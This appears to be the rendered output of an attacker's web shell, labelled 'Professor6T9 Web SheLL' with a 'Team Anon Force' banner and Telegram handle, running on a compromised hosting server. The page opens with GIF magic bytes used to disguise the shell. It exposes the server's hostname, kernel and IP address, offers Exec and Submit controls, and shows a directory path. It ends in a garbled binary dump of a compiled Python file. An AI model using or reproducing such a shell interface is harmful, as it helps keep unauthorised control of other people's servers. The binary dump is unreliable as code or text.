GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
alt-nodejs11
/
root
/
lib
/
node_modules
/
npm
/
node_modules
/
node-gyp
/
gyp
/
tools
[ HOME ]
Exec
Submit
File Name : pretty_vcproj.pyo
� R�nac @ s d Z d Z d d l Z d d l Z d d l m Z d d l m Z e � Z d a d e f d � � YZ d e f d � � YZ d d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z e d k r e j e e j � � n d S( s� Make the format of a vcproj really pretty. This script normalize and sort an xml. It also fetches all the properties inside linked vsprops and include them explicitly in the vcproj. It outputs the resulting xml to stdout. s nsylvain (Nicolas Sylvain)i����N( t parse( t Nodet CmpTuplec B s e Z d Z d � Z RS( s! Compare function between 2 tuple.c C s t | d | d � S( Ni ( t cmp( t selft xt y( ( sl /opt/alt/alt-nodejs11/root/usr/lib/node_modules/npm/node_modules.bundled/node-gyp/gyp/tools/pretty_vcproj.pyt __call__ s ( t __name__t __module__t __doc__R ( ( ( sl /opt/alt/alt-nodejs11/root/usr/lib/node_modules/npm/node_modules.bundled/node-gyp/gyp/tools/pretty_vcproj.pyR s t CmpNodec B s e Z d Z d � Z RS( s% Compare function between 2 xml nodes.c C s"